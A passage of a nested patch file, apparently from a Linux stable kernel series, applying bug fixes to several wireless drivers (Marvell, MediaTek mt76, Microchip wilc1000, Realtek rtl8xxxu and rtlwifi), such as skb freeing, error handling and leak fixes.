+ 	spin_lock_irqsave(&priv->driver_lock, flags);
+ 	memcpy(priv->cmd_resp_buff, recvbuff + MESSAGE_HEADER_LEN,
+ 	       recvlength - MESSAGE_HEADER_LEN);
+-	kfree_skb(skb);
++	dev_kfree_skb_irq(skb);
+ 	lbtf_cmd_response_rx(priv);
+ 	spin_unlock_irqrestore(&priv->driver_lock, flags);
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n.c b/drivers/net/wireless/marvell/mwifiex/11n.c
+index 4af57e6d43932..90e4011008981 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n.c
+@@ -878,7 +878,7 @@ mwifiex_send_delba_txbastream_tbl(struct mwifiex_private *priv, u8 tid)
+  */
+ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ {
+-	u8 i;
++	u8 i, j;
+ 	u32 tx_win_size;
+ 	struct mwifiex_private *priv;
+ 
+@@ -909,8 +909,8 @@ void mwifiex_update_ampdu_txwinsize(struct mwifiex_adapter *adapter)
+ 		if (tx_win_size != priv->add_ba_param.tx_win_size) {
+ 			if (!priv->media_connected)
+ 				continue;
+-			for (i = 0; i < MAX_NUM_TID; i++)
+-				mwifiex_send_delba_txbastream_tbl(priv, i);
++			for (j = 0; j < MAX_NUM_TID; j++)
++				mwifiex_send_delba_txbastream_tbl(priv, j);
+ 		}
+ 	}
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index 7378c4d1e1567..478bffb7418d9 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -573,6 +573,7 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 		return;
+ 
+ 	spin_lock_bh(&q->lock);
++
+ 	do {
+ 		buf = mt76_dma_dequeue(dev, q, true, NULL, NULL, &more);
+ 		if (!buf)
+@@ -580,6 +581,12 @@ mt76_dma_rx_cleanup(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		skb_free_frag(buf);
+ 	} while (1);
++
++	if (q->rx_head) {
++		dev_kfree_skb(q->rx_head);
++		q->rx_head = NULL;
++	}
++
+ 	spin_unlock_bh(&q->lock);
+ 
+ 	if (!q->rx_page.va)
+@@ -605,12 +612,6 @@ mt76_dma_rx_reset(struct mt76_dev *dev, enum mt76_rxq_id qid)
+ 	mt76_dma_rx_cleanup(dev, q);
+ 	mt76_dma_sync_idx(dev, q);
+ 	mt76_dma_rx_fill(dev, q);
+-
+-	if (!q->rx_head)
+-		return;
+-
+-	dev_kfree_skb(q->rx_head);
+-	q->rx_head = NULL;
+ }
+ 
+ static void
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 34ac3d81a5102..46ede1b72bbee 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -921,7 +921,7 @@ int mt76_connac2_reverse_frag0_hdr_trans(struct ieee80211_vif *vif,
+ 		ether_addr_copy(hdr.addr4, eth_hdr->h_source);
+ 		break;
+ 	default:
+-		break;
++		return -EINVAL;
+ 	}
+ 
+ 	skb_pull(skb, hdr_offset + sizeof(struct ethhdr) - 2);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+index 6ef3431cad648..2975128a78c90 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/debugfs.c
+@@ -759,7 +759,7 @@ mt7915_hw_queue_read(struct seq_file *s, u32 size,
+ 		if (val & BIT(map[i].index))
+ 			continue;
+ 
+-		ctrl = BIT(31) | (map[i].pid << 10) | (map[i].qid << 24);
++		ctrl = BIT(31) | (map[i].pid << 10) | ((u32)map[i].qid << 24);
+ 		mt76_wr(dev, MT_FL_Q0_CTRL, ctrl);
+ 
+ 		head = mt76_get_field(dev, MT_FL_Q2_CTRL,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+index 0bce0ce51be00..f0ec000d46cf7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/eeprom.c
+@@ -110,18 +110,23 @@ static int mt7915_eeprom_load(struct mt7915_dev *dev)
+ 	} else {
+ 		u8 free_block_num;
+ 		u32 block_num, i;
++		u32 eeprom_blk_size = MT7915_EEPROM_BLOCK_SIZE;
+ 
+-		mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
+-		/* efuse info not enough */
++		ret = mt7915_mcu_get_eeprom_free_block(dev, &free_block_num);
++		if (ret < 0)
++			return ret;
++
++		/* efuse info isn't enough */
+ 		if (free_block_num >= 29)
+ 			return -EINVAL;
+ 
+ 		/* read eeprom data from efuse */
+-		block_num = DIV_ROUND_UP(eeprom_size,
+-					 MT7915_EEPROM_BLOCK_SIZE);
+-		for (i = 0; i < block_num; i++)
+-			mt7915_mcu_get_eeprom(dev,
+-					      i * MT7915_EEPROM_BLOCK_SIZE);
++		block_num = DIV_ROUND_UP(eeprom_size, eeprom_blk_size);
++		for (i = 0; i < block_num; i++) {
++			ret = mt7915_mcu_get_eeprom(dev, i * eeprom_blk_size);
++			if (ret < 0)
++				return ret;
++		}
+ 	}
+ 
+ 	return mt7915_check_eeprom(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/init.c b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+index cc2aac86bcfb6..38e94187d5eda 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+@@ -200,8 +200,7 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 	phy->throttle_temp[0] = 110;
+ 	phy->throttle_temp[1] = 120;
+ 
+-	return mt7915_mcu_set_thermal_throttling(phy,
+-						 MT7915_THERMAL_THROTTLE_MAX);
++	return 0;
+ }
+ 
+ static void mt7915_led_set_config(struct led_classdev *led_cdev,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+index e6bf6e04d4b9c..1f3b7e7f48d50 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mac.c
+@@ -997,9 +997,6 @@ static void mt7915_mac_add_txs(struct mt7915_dev *dev, void *data)
+ 	u16 wcidx;
+ 	u8 pid;
+ 
+-	if (le32_get_bits(txs_data[0], MT_TXS0_TXS_FORMAT) > 1)
+-		return;
+-
+ 	wcidx = le32_get_bits(txs_data[2], MT_TXS2_WCID);
+ 	pid = le32_get_bits(txs_data[3], MT_TXS3_PID);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/main.c b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+index 89b519cfd14c3..060cb88e82e30 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/main.c
+@@ -57,6 +57,12 @@ static int mt7915_start(struct ieee80211_hw *hw)
+ 		mt7915_mac_enable_nf(dev, 1);
+ 	}
+ 
++	ret = mt7915_mcu_set_thermal_throttling(phy,
++						MT7915_THERMAL_THROTTLE_MAX);
++
++	if (ret)
++		goto out;
++
+ 	ret = mt76_connac_mcu_set_rts_thresh(&dev->mt76, 0x92b,
+ 					     phy != &dev->phy);
+ 	if (ret)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+index 8d297e4aa7d43..bcfc30d669c20 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mcu.c
+@@ -2299,13 +2299,14 @@ void mt7915_mcu_exit(struct mt7915_dev *dev)
+ 	__mt76_mcu_restart(&dev->mt76);
+ 	if (mt7915_firmware_state(dev, false)) {
+ 		dev_err(dev->mt76.dev, "Failed to exit mcu\n");
+-		return;
++		goto out;
+ 	}
+ 
+ 	mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(0), MT_TOP_LPCR_HOST_FW_OWN);
+ 	if (dev->hif2)
+ 		mt76_wr(dev, MT_TOP_LPCR_HOST_BAND(1),
+ 			MT_TOP_LPCR_HOST_FW_OWN);
++out:
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+ }
+ 
+@@ -2743,8 +2744,9 @@ int mt7915_mcu_get_eeprom(struct mt7915_dev *dev, u32 offset)
+ 	int ret;
+ 	u8 *buf;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_ACCESS), &req,
+-				sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_ACCESS),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -2769,8 +2771,9 @@ int mt7915_mcu_get_eeprom_free_block(struct mt7915_dev *dev, u8 *block_num)
+ 	struct sk_buff *skb;
+ 	int ret;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_EXT_QUERY(EFUSE_FREE_BLOCK), &req,
+-					sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_EXT_QUERY(EFUSE_FREE_BLOCK),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
+index 7bd5f6725d7b7..bc68ede64ddbb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mmio.c
+@@ -436,7 +436,7 @@ static u32 __mt7915_reg_addr(struct mt7915_dev *dev, u32 addr)
+ 
+ 	if (dev_is_pci(dev->mt76.dev) &&
+ 	    ((addr >= MT_CBTOP1_PHY_START && addr <= MT_CBTOP1_PHY_END) ||
+-	     (addr >= MT_CBTOP2_PHY_START && addr <= MT_CBTOP2_PHY_END)))
++	    addr >= MT_CBTOP2_PHY_START))
+ 		return mt7915_reg_map_l1(dev, addr);
+ 
+ 	/* CONN_INFRA: covert to phyiscal addr and use layer 1 remap */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+index 5920e705835a7..bf569aa0057a7 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/regs.h
+@@ -740,7 +740,6 @@ enum offs_rev {
+ #define MT_CBTOP1_PHY_START		0x70000000
+ #define MT_CBTOP1_PHY_END		__REG(CBTOP1_PHY_END)
+ #define MT_CBTOP2_PHY_START		0xf0000000
+-#define MT_CBTOP2_PHY_END		0xffffffff
+ #define MT_INFRA_MCU_START		0x7c000000
+ #define MT_INFRA_MCU_END		__REG(INFRA_MCU_ADDR_END)
+ #define MT_CONN_INFRA_OFFSET(p)		((p) - MT_INFRA_BASE)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index c74afa746251b..ee7ddda4288b8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -278,6 +278,7 @@ static int mt7986_wmac_coninfra_setup(struct mt7915_dev *dev)
+ 		return -EINVAL;
+ 
+ 	rmem = of_reserved_mem_lookup(np);
++	of_node_put(np);
+ 	if (!rmem)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+index 47e034a9b0037..ed9241d4aa641 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/acpi_sar.c
+@@ -33,14 +33,17 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 	    sar_root->package.elements[0].type != ACPI_TYPE_INTEGER) {
+ 		dev_err(mdev->dev, "sar cnt = %d\n",
+ 			sar_root->package.count);
++		ret = -EINVAL;
+ 		goto free;
+ 	}
+ 
+ 	if (!*tbl) {
+ 		*tbl = devm_kzalloc(mdev->dev, sar_root->package.count,
+ 				    GFP_KERNEL);
+-		if (!*tbl)
++		if (!*tbl) {
++			ret = -ENOMEM;
+ 			goto free;
++		}
+ 	}
+ 	if (len)
+ 		*len = sar_root->package.count;
+@@ -52,9 +55,9 @@ mt7921_acpi_read(struct mt7921_dev *dev, u8 *method, u8 **tbl, u32 *len)
+ 			break;
+ 		*(*tbl + i) = (u8)sar_unit->integer.value;
+ 	}
+-free:
+ 	ret = (i == sar_root->package.count) ? 0 : -EINVAL;
+ 
++free:
+ 	kfree(sar_root);
+ 
+ 	return ret;
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index 0ec308f99af5a..176207f3177c4 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -562,6 +562,10 @@ mt76s_tx_queue_skb_raw(struct mt76_dev *dev, struct mt76_queue *q,
+ 
+ 	q->entry[q->head].buf_sz = len;
+ 	q->entry[q->head].skb = skb;
++
++	/* ensure the entry fully updated before bus access */
++	smp_wmb();
++
+ 	q->head = (q->head + 1) % q->ndesc;
+ 	q->queued++;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+index bfc4de50a4d23..ddd8c0cc744df 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+@@ -254,6 +254,10 @@ static int mt76s_tx_run_queue(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		if (!test_bit(MT76_STATE_MCU_RUNNING, &dev->phy.state)) {
+ 			__skb_put_zero(e->skb, 4);
++			err = __skb_grow(e->skb, roundup(e->skb->len,
++							 sdio->func->cur_blksize));
++			if (err)
++				return err;
+ 			err = __mt76s_xmit_queue(dev, e->skb->data,
+ 						 e->skb->len);
+ 			if (err)
+diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.c b/drivers/net/wireless/mediatek/mt7601u/dma.c
+index 457147394edc4..773a1cc2f8520 100644
+--- a/drivers/net/wireless/mediatek/mt7601u/dma.c
++++ b/drivers/net/wireless/mediatek/mt7601u/dma.c
+@@ -123,7 +123,8 @@ static u16 mt7601u_rx_next_seg_len(u8 *data, u32 data_len)
+ 	if (data_len < min_seg_len ||
+ 	    WARN_ON_ONCE(!dma_len) ||
+ 	    WARN_ON_ONCE(dma_len + MT_DMA_HDRS > data_len) ||
+-	    WARN_ON_ONCE(dma_len & 0x3))
++	    WARN_ON_ONCE(dma_len & 0x3) ||
++	    WARN_ON_ONCE(dma_len < min_seg_len))
+ 		return 0;
+ 
+ 	return MT_DMA_HDRS + dma_len;
+diff --git a/drivers/net/wireless/microchip/wilc1000/netdev.c b/drivers/net/wireless/microchip/wilc1000/netdev.c
+index 9b319a455b96d..e9f59de31b0b9 100644
+--- a/drivers/net/wireless/microchip/wilc1000/netdev.c
++++ b/drivers/net/wireless/microchip/wilc1000/netdev.c
+@@ -730,6 +730,7 @@ netdev_tx_t wilc_mac_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 
+ 	if (skb->dev != ndev) {
+ 		netdev_err(ndev, "Packet not destined to this device\n");
++		dev_kfree_skb(skb);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -980,7 +981,7 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 						    ndev->name);
+ 	if (!wl->hif_workqueue) {
+ 		ret = -ENOMEM;
+-		goto error;
++		goto unregister_netdev;
+ 	}
+ 
+ 	ndev->needs_free_netdev = true;
+@@ -995,6 +996,11 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 
+ 	return vif;
+ 
++unregister_netdev:
++	if (rtnl_locked)
++		cfg80211_unregister_netdevice(ndev);
++	else
++		unregister_netdev(ndev);
+   error:
+ 	free_netdev(ndev);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index b06508d0cdf8f..46767dc6d6491 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1669,6 +1669,11 @@ static void rtl8192e_enable_rf(struct rtl8xxxu_priv *priv)
+ 	val8 = rtl8xxxu_read8(priv, REG_PAD_CTRL1);
+ 	val8 &= ~BIT(0);
+ 	rtl8xxxu_write8(priv, REG_PAD_CTRL1, val8);
++
++	/*
++	 * Fix transmission failure of rtl8192e.
++	 */
++	rtl8xxxu_write8(priv, REG_TXPAUSE, 0x00);
+ }
+ 
+ struct rtl8xxxu_fileops rtl8192eu_fops = {
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index e445084e358f9..95c0150f23569 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -5270,7 +5270,7 @@ static void rtl8xxxu_queue_rx_urb(struct rtl8xxxu_priv *priv,
+ 		pending = priv->rx_urb_pending_count;
+ 	} else {
+ 		skb = (struct sk_buff *)rx_urb->urb.context;
+-		dev_kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		usb_free_urb(&rx_urb->urb);
+ 	}
+ 
+@@ -5547,9 +5547,6 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 	btcoex = &priv->bt_coex;
+ 	rarpt = &priv->ra_report;
+ 
+-	if (priv->rf_paths > 1)
+-		goto out;
+-
+ 	while (!skb_queue_empty(&priv->c2hcmd_queue)) {
+ 		skb = skb_dequeue(&priv->c2hcmd_queue);
+ 
+@@ -5601,10 +5598,9 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 		default:
+ 			break;
+ 		}
+-	}
+ 
+-out:
+-	dev_kfree_skb(skb);
++		dev_kfree_skb(skb);
++	}
+ }
+ 
+ static void rtl8723bu_handle_c2h(struct rtl8xxxu_priv *priv,
+@@ -5970,7 +5966,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ {
+ 	struct rtl8xxxu_priv *priv = hw->priv;
+ 	struct device *dev = &priv->udev->dev;
+-	u16 val16;
+ 	int ret = 0, channel;
+ 	bool ht40;
+ 
+@@ -5980,14 +5975,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ 			 __func__, hw->conf.chandef.chan->hw_value,
+ 			 changed, hw->conf.chandef.width);
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_RETRY_LIMITS) {
+-		val16 = ((hw->conf.long_frame_max_tx_count <<
+-			  RETRY_LIMIT_LONG_SHIFT) & RETRY_LIMIT_LONG_MASK) |
+-			((hw->conf.short_frame_max_tx_count <<
+-			  RETRY_LIMIT_SHORT_SHIFT) & RETRY_LIMIT_SHORT_MASK);
+-		rtl8xxxu_write16(priv, REG_RETRY_LIMIT, val16);
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL) {
+ 		switch (hw->conf.chandef.width) {
+ 		case NL80211_CHAN_WIDTH_20_NOHT:
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+index 58c2ab3d44bef..de61c9c0ddec4 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+@@ -68,8 +68,10 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -79,10 +81,12 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl88ee_disable_bcn_sub_func(struct ieee80211_hw *hw)
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+index 189cc6437600f..0ba3bbed6ed36 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+@@ -30,8 +30,10 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -41,10 +43,12 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8723be_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+index 7e0f62d59fe17..a7e3250957dc9 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+@@ -26,8 +26,10 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -37,10 +39,12 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8821ae_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+index a29321e2fa72f..5323ead30db03 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+@@ -1598,18 +1598,6 @@ static bool _rtl8812ae_get_integer_from_string(const char *str, u8 *pint)
+ 	return true;
+ }
+ 
+-static bool _rtl8812ae_eq_n_byte(const char *str1, const char *str2, u32 num)
+-{
+-	if (num == 0)
+-		return false;
+-	while (num > 0) {
+-		num--;
+-		if (str1[num] != str2[num])
+-			return false;
+-	}
+-	return true;
+-}
+-
+ static s8 _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(struct ieee80211_hw *hw,
+ 					      u8 band, u8 channel)
+ {
+@@ -1659,42 +1647,42 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 	power_limit = power_limit > MAX_POWER_INDEX ?
+ 		      MAX_POWER_INDEX : power_limit;
+ 
+-	if (_rtl8812ae_eq_n_byte(pregulation, "FCC", 3))
++	if (strcmp(pregulation, "FCC") == 0)
+ 		regulation = 0;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "MKK", 3))
++	else if (strcmp(pregulation, "MKK") == 0)
+ 		regulation = 1;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "ETSI", 4))
++	else if (strcmp(pregulation, "ETSI") == 0)
+ 		regulation = 2;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "WW13", 4))
++	else if (strcmp(pregulation, "WW13") == 0)
+ 		regulation = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(prate_section, "CCK", 3))
++	if (strcmp(prate_section, "CCK") == 0)
+ 		rate_section = 0;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "OFDM", 4))
++	else if (strcmp(prate_section, "OFDM") == 0)
+ 		rate_section = 1;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 2;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 3;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 4;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 5;
+ 
+-	if (_rtl8812ae_eq_n_byte(pbandwidth, "20M", 3))
++	if (strcmp(pbandwidth, "20M") == 0)
+ 		bandwidth = 0;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "40M", 3))
++	else if (strcmp(pbandwidth, "40M") == 0)
+ 		bandwidth = 1;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "80M", 3))
++	else if (strcmp(pbandwidth, "80M") == 0)
+ 		bandwidth = 2;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "160M", 4))
++	else if (strcmp(pbandwidth, "160M") == 0)
+ 		bandwidth = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(pband, "2.4G", 4)) {
++	if (strcmp(pband, "2.4G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_2_4G,
+ 							       channel);
+@@ -1718,7 +1706,7 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 			regulation, bandwidth, rate_section, channel_index,
+ 			rtlphy->txpwr_limit_2_4g[regulation][bandwidth]
+ 				[rate_section][channel_index][RF90_PATH_A]);
+-	} else if (_rtl8812ae_eq_n_byte(pband, "5G", 2)) {
++	} else if (strcmp(pband, "5G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_5G,
+ 							       channel);
